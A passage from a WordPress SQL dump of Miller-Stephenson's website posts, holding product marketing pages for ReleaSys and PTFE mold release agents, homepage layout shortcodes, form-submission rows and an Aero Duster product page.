href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Satin</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Polyurethane Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-10 17:41:35', '2016-11-10 17:41:35', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2998, 3, '2016-11-10 17:43:21', '2016-11-10 17:43:21', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/"><strong>Thermoset polysiloxanes</strong></a>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-10 17:43:21', '2016-11-10 17:43:21', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2999, 158, '2016-11-10 20:45:26', '2016-11-10 20:45:26', '', '', '', 'publish', 'closed', 'closed', '', '2999', '', '', '2016-11-10 20:45:26', '2016-11-10 20:45:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/2999/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3000, 0, '2016-11-10 22:19:39', '2016-11-10 22:19:39', '', '', '', 'publish', 'closed', 'closed', '', '3000', '', '', '2016-11-10 22:19:40', '2016-11-10 22:19:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/3000/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3001, 159, '2016-11-10 23:51:07', '2016-11-10 23:51:07', '', '', '', 'publish', 'closed', 'closed', '', '3001', '', '', '2016-11-10 23:51:07', '2016-11-10 23:51:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3001/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3002, 0, '2016-11-11 05:56:07', '2016-11-11 05:56:07', '', '', '', 'publish', 'closed', 'closed', '', '3002', '', '', '2016-11-11 05:56:07', '2016-11-11 05:56:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3002/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3003, 1, '2016-11-11 10:23:56', '2016-11-11 10:23:56', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-11-11 10:23:56', '2016-11-11 10:23:56', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3004, 0, '2016-11-11 18:57:29', '2016-11-11 18:57:29', '', '', '', 'publish', 'closed', 'closed', '', '3004', '', '', '2016-11-11 18:57:29', '2016-11-11 18:57:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3004/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3005, 3, '2016-11-11 19:17:09', '2016-11-11 19:17:09', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agent</a>s, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-11 19:17:09', '2016-11-11 19:17:09', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3006, 162, '2016-11-11 19:27:41', '2016-11-11 19:27:41', '', '', '', 'publish', 'closed', 'closed', '', '3006', '', '', '2016-11-11 19:27:41', '2016-11-11 19:27:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/3006/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3007, 163, '2016-11-11 21:37:36', '2016-11-11 21:37:36', '', '', '', 'publish', 'closed', 'closed', '', '3007', '', '', '2016-11-11 21:37:36', '2016-11-11 21:37:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/3007/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3008, 164, '2016-11-11 22:46:31', '2016-11-11 22:46:31', '', '', '', 'publish', 'closed', 'closed', '', '3008', '', '', '2016-11-11 22:46:32', '2016-11-11 22:46:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/3008/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3009, 0, '2016-11-12 07:51:37', '2016-11-12 07:51:37', '', '', '', 'publish', 'closed', 'closed', '', '3009', '', '', '2016-11-12 07:51:37', '2016-11-12 07:51:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3009/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3010, 3, '2016-11-12 14:14:51', '2016-11-12 14:14:51', 'Aero Duster MS-222N  contains ultra pure HFC 134a propellant and compressed air which is used to remove dust from electronics, computers, magnetic tapes, optics, and other sensitive equipment. It is nonflammable, odorless, nonconductive, and leaves no residue. 14 oz Aerosol. These Aero-Dusters perform as compressed air that deliver a dry blast to remove microscopic dust innumerous applications in areas of electronic,photographic, computer, and other energized electrical equipment. The Aero-Duster is a pure product with notraces of contaminates and oils, which is essential for critical applications.\nAero-Duster removes microscopic dust from:\n<ul>\n 	<li>Semiconductor chips</li>\n 	<li>Specimens under electron microscopes</li>\n 	<li>Photographic negatives</li>\n 	<li>Energized Electrical Equipment such as:</li>\n 	<li>Microminiature assemblies</li>\n 	<li>Electromechanical instruments</li>\n 	<li>Magnetic tapes &amp; heads</li>\n 	<li>Servomechanisms</li>\n 	<li>Computer peripherals</li>\n 	<li>The Cobra Duster extension, MS-228, may be used in conjunction with the Aero-Duster for delivery to elusive trouble spots on various equipment.</li>\n</ul>\n<strong>MS-222L</strong>: Also available in a low global warming formulation. The MS-222L a high purity product with no traces of contaminates and oils, which is essential for critical applications. Removes microscopic dust. Recommended for electro-mechanical instruments, computer equipment, optics and other equipment. May be used with the MS-228 Cobra® Duster extension for use in hard to reach areas. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).\n<table width="399">\n<tbody>\n<tr>\n<td width="219">Molecular Weight</td>\n<td style="text-align: center;" width="180">115</td>\n</tr>\n<tr>\n<td>Boiling Point</td>\n<td style="text-align: center;">-19°C</td>\n</tr>\n<tr>\n<td>Vapor Pressure (mmHg)</td>\n<td style="text-align: center;">60.8 psia @ 20°C</td>\n</tr>\n<tr>\n<td>Density</td>\n<td style="text-align: center;">1.17 @ 21.1°C</td>\n</tr>\n<tr>\n<td>VOC</td>\n<td style="text-align: center;">Exempt</td>\n</tr>\n<tr>\n<td>ODP</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>GWP</td>\n<td style="text-align: center;">0</td>\n</tr>\n</tbody>\n</table>', 'AeroDuster® MS-222N', 'The convenient nonflammable way to remove microscopic dust. Recommended for electromechanical instruments, computer equipment, and optics. High purity. May be used with MS-228 Cobra® Duster extension for use in hard to reach areas. No ODC (ozone 